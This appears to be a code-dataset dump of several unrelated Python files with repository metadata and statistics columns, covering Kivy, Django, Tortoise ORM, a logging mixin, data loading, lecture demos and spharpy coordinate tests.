self.assertGreaterEqual(len(self.preOpenMarket.PreOpenMarket(self.preOpenMarket.NIFTYBANK)),1)
self.assertRaises(ValueError,self.preOpenMarket.PreOpenMarket,{})
if __name__=='__main__':
unittest.main() | 56.081967 | 121 | 0.808536 | 386 | 3,421 | 7.095855 | 0.251295 | 0.11245 | 0.127784 | 0.09529 | 0.412559 | 0.315444 | 0.211391 | 0.141658 | 0.141658 | 0.115371 | 0 | 0.020994 | 0.053201 | 3,421 | 61 | 122 | 56.081967 | 0.824637 | 0.0304 | 0 | 0 | 0 | 0 | 0.049457 | 0 | 0 | 0 | 0 | 0 | 0.474576 | 1 | 0.118644 | false | 0 | 0.118644 | 0 | 0.254237 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
25579699ea8aae8b203d129009a97d6fa5a1aaf4 | 493 | py | Python | example1/参考/buttonlauncher2.py | SasuraiNoHoge/Kivy_practice | c046660cb3f3b9180dec9d65e2cd74347c6636c9 | [
"MIT"
] | 4 | 2017-09-23T15:03:17.000Z | 2020-12-05T22:06:20.000Z | example1/参考/buttonlauncher2.py | SasuraiNoHoge/Kivy_practice | c046660cb3f3b9180dec9d65e2cd74347c6636c9 | [
"MIT"
] | 1 | 2020-03-10T21:54:25.000Z | 2020-03-10T21:54:25.000Z | example1/参考/buttonlauncher2.py | SasuraiNoHoge/Kivy_practice | c046660cb3f3b9180dec9d65e2cd74347c6636c9 | [
"MIT"
] | 7 | 2017-11-17T02:38:18.000Z | 2021-09-26T14:23:58.000Z | # -*- coding: utf-8 -*-
import kivy
kivy.require('1.9.0')
from kivy.app import App
from kivy.config import Config
from kivy.uix.widget import Widget
from kivy.uix.label import Label
from kivy.lang import Builder
Builder.load_file('buttonlauncher2.kv')
class MyWidget(Widget):
def __init__(self ,**kwargs):
super(MyWidget, self).__init__()
class ButtonLauncher2App(App):
def build(self):
return MyWidget()
if __name__ == '__main__':
ButtonLauncher2App().run() | 20.541667 | 40 | 0.709939 | 66 | 493 | 5.045455 | 0.530303 | 0.12012 | 0.066066 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.01699 | 0.1643 | 493 | 24 | 41 | 20.541667 | 0.791262 | 0.042596 | 0 | 0 | 0 | 0 | 0.065817 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.125 | false | 0 | 0.375 | 0.0625 | 0.6875 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 |
255a33ce29c26d4168ff7ae800d882e91dd942a0 | 225 | py | Python | vseros/2016-17/okr/genom.py | dluschan/olymp | dfbf4352dbc7f6fd7563e7bd19aff6fd67fb50b7 | [
"MIT"
] | null | null | null | vseros/2016-17/okr/genom.py | dluschan/olymp | dfbf4352dbc7f6fd7563e7bd19aff6fd67fb50b7 | [
"MIT"
] | null | null | null | vseros/2016-17/okr/genom.py | dluschan/olymp | dfbf4352dbc7f6fd7563e7bd19aff6fd67fb50b7 | [
"MIT"
] | 1 | 2018-09-14T18:50:48.000Z | 2018-09-14T18:50:48.000Z | s = input()
g1 = {}
for i in range(1, len(s)):
g1[s[i-1: i+1]] = g1.get(s[i-1: i+1], 0) + 1
s = input()
g2 = set()
for i in range(1, len(s)):
g2.add(s[i-1: i+1])
print(sum([g1[g] for g in frozenset(g1.keys()) & g2]))
| 22.5 | 54 | 0.506667 | 54 | 225 | 2.111111 | 0.351852 | 0.105263 | 0.078947 | 0.105263 | 0.412281 | 0.280702 | 0.280702 | 0 | 0 | 0 | 0 | 0.101124 | 0.208889 | 225 | 9 | 55 | 25 | 0.539326 | 0 | 0 | 0.444444 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0.111111 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
255be9e1908b2bbd852a467ab339fc0b83e09dd3 | 1,864 | py | Python | anemoi/utils/mixins.py | looselycoupled/anemoi | b494a8e1bc70feda882a7ed3a1ca0cb17fc1f486 | [
"MIT"
] | null | null | null | anemoi/utils/mixins.py | looselycoupled/anemoi | b494a8e1bc70feda882a7ed3a1ca0cb17fc1f486 | [
"MIT"
] | 2 | 2017-08-09T14:24:15.000Z | 2021-06-01T22:02:42.000Z | anemoi/utils/mixins.py | looselycoupled/anemoi | b494a8e1bc70feda882a7ed3a1ca0cb17fc1f486 | [
"MIT"
] | 1 | 2017-08-09T16:58:38.000Z | 2017-08-09T16:58:38.000Z | # anemoi.utils.mixins
# Mixin classes for convencience and central configuration
#
# Author: Allen Leis <allen.leis@gmail.com>
# Created: Sat Aug 05 15:40:46 2017 -0400
#
# Copyright (C) 2017 Allen Leis
# For license information, see LICENSE
#
# ID: mixins.py [] allen.leis@gmail.com $
"""
Mixin classes for convencience and central configuration
"""
##########################################################################
# Imports
##########################################################################
import os
import sys
import logging
import logging.config
try:
from anemoi.config import settings
except ImportError as e:
sys.path.insert(0, os.getcwd())
from anemoi.config import settings
##########################################################################
# Classes
##########################################################################
class LoggableMixin(object):
"""
Placeholder logging mixin for eventual configuration or wrapping of global
logging features.
Possible TODO features include:
self.logger.error() should email admins
"""
def __init__(self, *args, **kwargs):
logging.config.dictConfigClass(settings.logging.dict_config()).configure()
self.logger = logging.getLogger('anemoi')
super(LoggableMixin, self).__init__(*args, **kwargs)
##########################################################################
# Execution
##########################################################################
if __name__ == '__main__':
obj = LoggableMixin()
obj.logger.debug("Test for debug...")
obj.logger.info("Test for info...")
obj.logger.warning("Test for warning...")
obj.logger.error("Test for error...")
obj.logger.critical("Test for critical...")
try:
1/0
except Exception as e:
obj.logger.exception(e)
| 29.125 | 82 | 0.521996 | 178 | 1,864 | 5.370787 | 0.494382 | 0.056485 | 0.031381 | 0.056485 | 0.167364 | 0.104603 | 0.104603 | 0 | 0 | 0 | 0 | 0.014529 | 0.150751 | 1,864 | 63 | 83 | 29.587302 | 0.589387 | 0.280043 | 0 | 0.16 | 0 | 0 | 0.121034 | 0 | 0 | 0 | 0 | 0.015873 | 0 | 1 | 0.04 | false | 0 | 0.28 | 0 | 0.36 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
255cff2bdfaa41fa3a18b09cdbbe3b37020dfaa2 | 3,177 | py | Python | csv_to_dict.py | vtsuperdarn/SD_exodus | d486614e40f2bb60abf5aafc412a15551cc09d20 | [
"MIT"
] | null | null | null | csv_to_dict.py | vtsuperdarn/SD_exodus | d486614e40f2bb60abf5aafc412a15551cc09d20 | [
"MIT"
] | null | null | null | csv_to_dict.py | vtsuperdarn/SD_exodus | d486614e40f2bb60abf5aafc412a15551cc09d20 | [
"MIT"
] | null | null | null | """
Written by Muhammad on 09/02/2018
"""
import datetime as dt
import logging
import numpy as np
import pandas as pd
import ast
def csv_to_dict(fname, stime=None, etime=None, sep="|", orient="list"):
"""Reads data from a csv file and returns a dictionary.
Parameter
---------
fname : str
Full path of a csv file.
stime : Optional[datetime.datetime]
The start time of interest
etime : Optional[datetime.datetime]
The end time of interest.
If set to None, reads data to the end of a day
sep : str
Delimiter to use
Returns
-------
data_dict : dict
A dictionary object that holds the data
"""
# Load to a pandas dataframe
print("Loading csv file to pandas dataframe")
date_parser = lambda x: dt.datetime.strptime(x, "%Y-%m-%d %H:%M:%S")
df = pd.read_csv(fname, sep=sep, na_values="None",
parse_dates=['time'],
date_parser=date_parser)
if stime is not None:
df = df.loc[df.time >= stime, :]
if etime is not None:
df = df.loc[df.time <= etime, :]
# Convert to a dict
print("Converting pandas dataframe to dict")
# NOTE We'll use list orientation even though
# we need records orientation because some of
# the columns from the DF are lists which
# get interpreted as strings by pandas
# and it becomes messy, this is a simple
# method Muhammad deviced and I'm building on it.
data_dict = df.to_dict(orient="list")
print df["ptab"].dtypes
# Convert a string representation of list to a list
prm_keys = ["ptab", "ltab"]
fit_keys = ["elv", "gflg", "nlag", "p_l", "p_l_e", "p_s",
"p_s_e", "phi0", "phi0_e", "pwr0", "qflg", "slist", "v",
"v_e", "w_l", "w_l_e", "w_s", "w_s_e"]
keys_list = prm_keys + fit_keys
print("Converting string representation of lists to normal lists")
for ky in keys_list:
data_dict[ky] = [ast.literal_eval(x) for x in data_dict[ky]]
#for x in data_dict[ky]:
# try:
# ast.literal_eval(x)
# except:
# import pdb
# pdb.set_trace()
# # if we need a list of dicts conver the dict of lists to the format
# if orient == "records":
# listDict = [dict(zip(data_dict,t)) for t in zip(*data_dict.values())]
# return listDict
return data_dict
# run the code
def main(orient="list"):
# Set the logging level
logging.getLogger().setLevel(logging.WARNING)
# input parameters
stime = None
etime = None
#stime = dt.datetime(2012,12,31)
#etime = dt.datetime(2012,12,31, 1, 0)
csv_sep = "|" # Delimiter to use
# Convert dmap format to csv
fdir = "./data/tmp/"
#fname = fdir + "20121231.000000.20130101.000000.fhe.fitacf.csv"
fname = fdir + "20130110.180000.20130111.180000.bks.fitacf.csv"
#data_dict = csv_to_dict(fname, stime=stime, etime=etime, sep=csv_sep)
data_dict = csv_to_dict(fname, stime=stime, etime=etime, sep=csv_sep, orient=orient)
return data_dict
if __name__ == "__main__":
data_dict = main()
| 29.971698 | 88 | 0.610324 | 469 | 3,177 | 4.008529 | 0.362473 | 0.051064 | 0.014362 | 0.02234 | 0.123936 | 0.094681 | 0.07766 | 0.07766 | 0.054255 | 0.054255 | 0 | 0.036812 | 0.273214 | 3,177 | 105 | 89 | 30.257143 | 0.777393 | 0.299969 | 0 | 0.052632 | 0 | 0 | 0.187687 | 0.027496 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.131579 | null | null | 0.105263 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
2561c0cbb1b53736d4de2696d2a27f845b5e75a6 | 408 | py | Python | torstream/peerflix_test.py | PandaWhoCodes/torstream | a619b382677cf70e7eae3bff8800741f84da475b | [
"MIT"
] | 3 | 2018-04-03T04:13:22.000Z | 2021-11-10T09:03:29.000Z | torstream/peerflix_test.py | PandaWhoCodes/torstream | a619b382677cf70e7eae3bff8800741f84da475b | [
"MIT"
] | null | null | null | torstream/peerflix_test.py | PandaWhoCodes/torstream | a619b382677cf70e7eae3bff8800741f84da475b | [
"MIT"
] | null | null | null | import os
def test_system():
"""Runs few tests to check if npm and peerflix is installed on the system."""
if os.system('npm --version') != 0:
print('NPM not installed installed, please read the Readme file for more information.')
exit()
if os.system('peerflix --version') != 0:
print('Peerflix not installed, installing..')
os.system('npm install -g peerflix')
| 34 | 95 | 0.642157 | 56 | 408 | 4.660714 | 0.589286 | 0.091954 | 0.076628 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.00639 | 0.232843 | 408 | 11 | 96 | 37.090909 | 0.827476 | 0.17402 | 0 | 0 | 0 | 0 | 0.507553 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.125 | true | 0 | 0.125 | 0 | 0.25 | 0.25 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
25635d49759987bc94c91b4f76a39a69baa8ed0c | 546 | py | Python | apps/organizations/migrations/0002_auto_20191013_0307.py | islandowner-web/IT-MOOC | f361512e6ff81a6e120ee808b20d78a79e325f5c | [
"MIT"
] | 9 | 2020-01-30T16:13:00.000Z | 2022-03-22T03:49:18.000Z | apps/organizations/migrations/0002_auto_20191013_0307.py | islandowner-web/IT-MOOC | f361512e6ff81a6e120ee808b20d78a79e325f5c | [
"MIT"
] | 8 | 2020-04-10T17:24:09.000Z | 2022-03-23T10:38:27.000Z | apps/organizations/migrations/0002_auto_20191013_0307.py | islandowner-web/IT-MOOC | f361512e6ff81a6e120ee808b20d78a79e325f5c | [
"MIT"
] | 2 | 2020-07-05T13:42:12.000Z | 2020-12-17T05:50:48.000Z | # Generated by Django 2.2 on 2019-10-13 03:07
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('organizations', '0001_initial'),
]
operations = [
migrations.RenameField(
model_name='courseorg',
old_name='course_name',
new_name='course_nums',
),
migrations.AlterField(
model_name='city',
name='name',
field=models.CharField(max_length=20, verbose_name='城市名'),
),
]
| 22.75 | 70 | 0.575092 | 55 | 546 | 5.545455 | 0.709091 | 0.059016 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.05305 | 0.309524 | 546 | 23 | 71 | 23.73913 | 0.755968 | 0.078755 | 0 | 0.117647 | 1 | 0 | 0.133733 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.058824 | 0 | 0.235294 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
2567e292cd2f27452ebf517a8089483384418582 | 898 | py | Python | Sim_ATAV/vehicle_control/controller_commons/perception/object_creation/lidar_object.py | SahilDhull/autonomous | 378fc7d6c5a9c34c4e915f080fb78ed5c11195d6 | [
"MIT"
] | 3 | 2020-02-28T12:04:26.000Z | 2022-02-27T00:42:56.000Z | Sim_ATAV/vehicle_control/controller_commons/perception/object_creation/lidar_object.py | SahilDhull/autonomous | 378fc7d6c5a9c34c4e915f080fb78ed5c11195d6 | [
"MIT"
] | null | null | null | Sim_ATAV/vehicle_control/controller_commons/perception/object_creation/lidar_object.py | SahilDhull/autonomous | 378fc7d6c5a9c34c4e915f080fb78ed5c11195d6 | [
"MIT"
] | null | null | null | """Defines LidarObject class.
----------------------------------------------------------------------------------------------------------
This file is part of Sim-ATAV project and licensed under MIT license.
Copyright (c) 2018 Cumhur Erkan Tuncali, Georgios Fainekos, Danil Prokhorov, Hisahiro Ito, James Kapinski.
For questions please contact:
C. Erkan Tuncali (etuncali [at] asu.edu)
----------------------------------------------------------------------------------------------------------
"""
class LidarObject(object):
OBJECT_CAR = 0
OBJECT_PEDESTRIAN = 1
OBJECT_BIKE = 2
OBJECT_TRUCK = 3
"""LidarObject class defines features of the object detected by LIDAR."""
def __init__(self, lidar_cluster, object_class, relative_position):
self.lidar_cluster = lidar_cluster
self.object_class = object_class
self.relative_position = relative_position
| 39.043478 | 106 | 0.562361 | 90 | 898 | 5.422222 | 0.644444 | 0.07377 | 0.065574 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.010444 | 0.146993 | 898 | 22 | 107 | 40.818182 | 0.626632 | 0.54343 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.111111 | false | 0 | 0 | 0 | 0.666667 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 |
256ac54ac312bf9d725dec882b64b477ddf93c2f | 1,739 | py | Python | nomalib/devices.py | joeugenio/noma_simulation | 4182509fccc01b1999998ff1907ea834dd677519 | [
"MIT"
] | 1 | 2019-11-04T01:15:06.000Z | 2019-11-04T01:15:06.000Z | nomalib/devices.py | joeugenio/noma_simulation | 4182509fccc01b1999998ff1907ea834dd677519 | [
"MIT"
] | null | null | null | nomalib/devices.py | joeugenio/noma_simulation | 4182509fccc01b1999998ff1907ea834dd677519 | [
"MIT"
] | null | null | null | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
# Federal University of Campina Grande (UFCG)
# Author: Joel Eugênio Cordeiro Junior
# Date: 28/08/2017
# Last update: 30/01/2018
# Version: 1.0
# Python module for NOMA communications simulations
# The devices classes are declared here
# modules
import numpy as np
import constants as const
# classes
class Coordinate:
''' Coordinate x and y'''
def __init__(self,x,y):
self.x = x
self.y = y
class BSAntenna:
''' Base Station Antenna '''
def __init__(self, theta_min, bs_gain = const.BSG):
self.theta_min = theta_min
self.bs_gain = bs_gain
''' Radiation Pattern '''
def radiation_pattern(self, theta, theta3db=65, att_max=20):
a = 12*(theta/np.radians(theta3db))**2
return (-1)*np.min([a,att_max])
class UEAntenna:
''' User Equipment Antenna '''
def __init__(self, ue_gain = const.UEG):
self.ue_g = ue_gain
''' Radiation Pattern Omni-directional'''
def radiation_pattern(self, theta):
return 0
class BaseStation:
''' Base Station - eNodeB '''
def __init__(self, id:str, coord:Coordinate, hight=const.BSH, power=const.BSPW, n_sector=const.):
self.id = id
self.h = hight
self.pwr = power
self.n_sec = n_sector
self.coord = coord
self.ue_id = []
class UserEquipment:
''' Equipment of User '''
def __init__(self, id:str, coord:Coordinate, hight=UEH, power=UEPW):
self.id = id
self.coord = coord
self.h = hight
self.pwr = power
self.bs_id = None
def received_power(self):
rx_pwr = tx_pwr-np.max()
| 26.348485 | 101 | 0.59977 | 230 | 1,739 | 4.356522 | 0.465217 | 0.03493 | 0.05489 | 0.035928 | 0.179641 | 0.123753 | 0.123753 | 0.071856 | 0 | 0 | 0 | 0.0249 | 0.284071 | 1,739 | 65 | 102 | 26.753846 | 0.77992 | 0.162162 | 0 | 0.228571 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.057143 | null | null | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
256c5a67dd5bb18b8235b86ade8db32db44789e2 | 1,275 | py | Python | lecture_demos/13_Lecture_Demo.py | theCodingProfessor/intro_to_Python | 87c3c4816530f4ca07091d17acf645f3261ecaea | [
"MIT"
] | null | null | null | lecture_demos/13_Lecture_Demo.py | theCodingProfessor/intro_to_Python | 87c3c4816530f4ca07091d17acf645f3261ecaea | [
"MIT"
] | null | null | null | lecture_demos/13_Lecture_Demo.py | theCodingProfessor/intro_to_Python | 87c3c4816530f4ca07091d17acf645f3261ecaea | [
"MIT"
] | null | null | null | # Code Demo for 13 Lecture
# Working with Python Strings
# CIS 135 - Code Demo File
# Lecture example showing string contatenation
firstName = "Peter"
lastName = "Parker"
print("\nString Contcatenation in Pyton uses the + operator")
print(f'First Name = {firstName}')
print(f'Last Name = {lastName}')
print("Peter Parker can be concatenated as 'firstName' + ' ' + 'lastName'")
print("Hello,", firstName + ' ' + lastName)
# Example slicing JJC
JJC = "Joliet Junior College"
print('\nJJC = "Joliet Junior College"')
print("\nExtract 'Joliet' from the variable JJC")
print(JJC[0:6]) # this returns the first six characters
print("\nExtract 'College' from the variable JJC")
print(JJC[-7:]) # this returns the final seven characters
print("\nExtract 'Junior' from the variable JJC")
print(JJC[7:-7]) # this returns the final seven characters
alphas = 'abcdefghi'
print(f'\nThe variable alphas = {alphas}')
print('alphas[1:3] extract characters ', alphas[4:8])
print('alphas[:3] = will extract characters ', alphas[:3])
print('alphas[-2:] = will extract characters ', alphas[-2:])
print('alphas[-3:-2] = will extract characters ', alphas[-3:-2])
this_string = " some text "
print(this_string.lstrip())
print(this_string.rstrip()) | 35.416667 | 76 | 0.689412 | 171 | 1,275 | 5.122807 | 0.403509 | 0.091324 | 0.105023 | 0.061644 | 0.267123 | 0.170091 | 0.140411 | 0 | 0 | 0 | 0 | 0.020716 | 0.167059 | 1,275 | 36 | 77 | 35.416667 | 0.804143 | 0.203922 | 0 | 0 | 0 | 0 | 0.578189 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0.791667 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 |
256cdec8b8c8d411042c64b792a32264dd68675a | 2,190 | py | Python | examples/models.py | cat-x/fastapi-admin | d9496b7e487134e5df1691df6652dca1c405919a | [
"Apache-2.0"
] | 1 | 2021-02-14T12:08:32.000Z | 2021-02-14T12:08:32.000Z | examples/models.py | KonstantinKlepikov/fastapi-admin | a1baa185a77252f10afe1bd76e5ff3791158be98 | [
"Apache-2.0"
] | null | null | null | examples/models.py | KonstantinKlepikov/fastapi-admin | a1baa185a77252f10afe1bd76e5ff3791158be98 | [
"Apache-2.0"
] | 2 | 2020-10-23T03:47:22.000Z | 2020-10-26T10:24:56.000Z | import datetime
from tortoise import Model, fields
from fastapi_admin.models import AbstractAdminLog, AbstractPermission, AbstractRole, AbstractUser
from .enums import ProductType, Status
class User(AbstractUser):
last_login = fields.DatetimeField(description="Last Login", default=datetime.datetime.now)
avatar = fields.CharField(max_length=200, default="")
intro = fields.TextField(default="")
created_at = fields.DatetimeField(auto_now_add=True)
def __str__(self):
return f"{self.pk}#{self.username}"
def rowVariant(self) -> str:
if not self.is_active:
return "warning"
return ""
def cellVariants(self) -> dict:
if self.is_active:
return {
"intro": "info",
}
return {}
class PydanticMeta:
computed = ("rowVariant", "cellVariants")
class Permission(AbstractPermission):
"""
must inheritance AbstractPermission
"""
class Role(AbstractRole):
"""
must inheritance AbstractRole
"""
class AdminLog(AbstractAdminLog):
"""
must inheritance AbstractAdminLog
"""
class Category(Model):
slug = fields.CharField(max_length=200)
name = fields.CharField(max_length=200)
created_at = fields.DatetimeField(auto_now_add=True)
def __str__(self):
return f"{self.pk}#{self.name}"
class Product(Model):
categories = fields.ManyToManyField("models.Category")
name = fields.CharField(max_length=50)
view_num = fields.IntField(description="View Num")
sort = fields.IntField()
is_reviewed = fields.BooleanField(description="Is Reviewed")
type = fields.IntEnumField(ProductType, description="Product Type")
image = fields.CharField(max_length=200)
body = fields.TextField()
created_at = fields.DatetimeField(auto_now_add=True)
def __str__(self):
return f"{self.pk}#{self.name}"
class Config(Model):
label = fields.CharField(max_length=200)
key = fields.CharField(max_length=20)
value = fields.JSONField()
status: Status = fields.IntEnumField(Status, default=Status.on)
def __str__(self):
return f"{self.pk}#{self.label}"
| 25.764706 | 97 | 0.677169 | 241 | 2,190 | 5.995851 | 0.344398 | 0.072664 | 0.087197 | 0.116263 | 0.289965 | 0.174394 | 0.174394 | 0.174394 | 0.155709 | 0.155709 | 0 | 0.010951 | 0.207763 | 2,190 | 84 | 98 | 26.071429 | 0.821902 | 0.045205 | 0 | 0.176471 | 0 | 0 | 0.089487 | 0.043521 | 0 | 0 | 0 | 0 | 0 | 1 | 0.117647 | false | 0 | 0.078431 | 0.078431 | 0.901961 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 |
256ed099b27158e9c8e19a42a3af192f85d25b09 | 754 | py | Python | dbtools/admin.py | snowminc/Groupformer | 5712ab3b2c21ebea9d96adab6265acba4000fb9e | [
"MIT"
] | 1 | 2021-02-19T18:43:35.000Z | 2021-02-19T18:43:35.000Z | dbtools/admin.py | snowminc/Groupformer | 5712ab3b2c21ebea9d96adab6265acba4000fb9e | [
"MIT"
] | 72 | 2021-02-16T23:37:09.000Z | 2021-05-10T21:58:31.000Z | dbtools/admin.py | snowminc/Groupformer | 5712ab3b2c21ebea9d96adab6265acba4000fb9e | [
"MIT"
] | 2 | 2021-09-05T03:00:05.000Z | 2021-09-13T14:38:26.000Z | from django.contrib import admin
# Register your models here.
from .models import *
class GroupFormerAdmin(admin.ModelAdmin):
search_fields = ['class_section']
class ProjectAdmin(admin.ModelAdmin):
search_fields = ['project_name']
class AttributeAdmin(admin.ModelAdmin):
pass
class ParticipantAdmin(admin.ModelAdmin):
pass
class AttrChoiceAdmin(admin.ModelAdmin):
pass
class ProjChoiceAdmin(admin.ModelAdmin):
pass
admin.site.register(GroupFormer, GroupFormerAdmin)
admin.site.register(Project, ProjectAdmin)
admin.site.register(Attribute, AttributeAdmin)
admin.site.register(Participant, ParticipantAdmin)
admin.site.register(attribute_selection, AttrChoiceAdmin)
admin.site.register(project_selection, ProjChoiceAdmin)
| 24.322581 | 57 | 0.802387 | 80 | 754 | 7.4875 | 0.35 | 0.15025 | 0.170284 | 0.1202 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.106101 | 754 | 30 | 58 | 25.133333 | 0.888724 | 0.034483 | 0 | 0.2 | 0 | 0 | 0.034435 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0.2 | 0.1 | 0 | 0.5 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 |
c25101bc085a4fe887123f30425feea4b414eb1c | 246 | py | Python | shortener/urls.py | warlock57/mybitly | 0afbb3830f3f9a867503509f87d7b5d3dc5480ff | [
"MIT"
] | null | null | null | shortener/urls.py | warlock57/mybitly | 0afbb3830f3f9a867503509f87d7b5d3dc5480ff | [
"MIT"
] | null | null | null | shortener/urls.py | warlock57/mybitly | 0afbb3830f3f9a867503509f87d7b5d3dc5480ff | [
"MIT"
] | null | null | null | from django.conf.urls import url
from .views import (
HomeView,
MyBitlyRedirectView,
)
urlpatterns = [
url(r'^$', HomeView.as_view(), name='home'),
url(r'^(?P<shortcode>[\w-]+)$', MyBitlyRedirectView.as_view(), name='short'),
]
| 20.5 | 81 | 0.638211 | 29 | 246 | 5.344828 | 0.655172 | 0.051613 | 0.129032 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.158537 | 246 | 11 | 82 | 22.363636 | 0.748792 | 0 | 0 | 0 | 0 | 0 | 0.138211 | 0.093496 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.222222 | 0 | 0.222222 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
c25488d8cf10c2a7ff35bb7be0fbcb6b173f35ff | 7,805 | py | Python | tests/test_coordinates.py | mberz/spharpy | e74c30c297dd9ad887e7345c836a515daa6f21f4 | [
"MIT"
] | null | null | null | tests/test_coordinates.py | mberz/spharpy | e74c30c297dd9ad887e7345c836a515daa6f21f4 | [
"MIT"
] | null | null | null | tests/test_coordinates.py | mberz/spharpy | e74c30c297dd9ad887e7345c836a515daa6f21f4 | [
"MIT"
] | null | null | null | import numpy as np
import numpy.testing as npt
import pytest
import spharpy
from spharpy.samplings.coordinates import Coordinates, SamplingSphere
from spharpy.samplings import sph2cart, cart2sph, cart2latlon
def test_coordinates_init():
coords = Coordinates()
assert isinstance(coords, Coordinates)
def test_coordinates_init_val():
coords = Coordinates(1, 0, 0)
assert isinstance(coords, Coordinates)
def test_coordinates_init_incomplete():
x = [1, 2]
y = 1
z = 1
with pytest.raises(ValueError):
Coordinates(x, y, z)
pytest.fail("Input arrays need to have same dimensions.")
def test_coordinates_init_from_cartesian():
x = 1
y = 0
z = 0
coords = Coordinates.from_cartesian(x, y, z)
npt.assert_allclose(coords._x, x)
npt.assert_allclose(coords._y, y)
npt.assert_allclose(coords._z, z)
def test_coordinates_init_from_spherical():
x = 1
y = 0
z = 0
rad, theta, phi = cart2sph(x, y, z)
coords = Coordinates.from_spherical(rad, theta, phi)
# use atol here because of numerical rounding issues introduced in
# the coordinate conversion
npt.assert_allclose(coords._x, x, atol=1e-15)
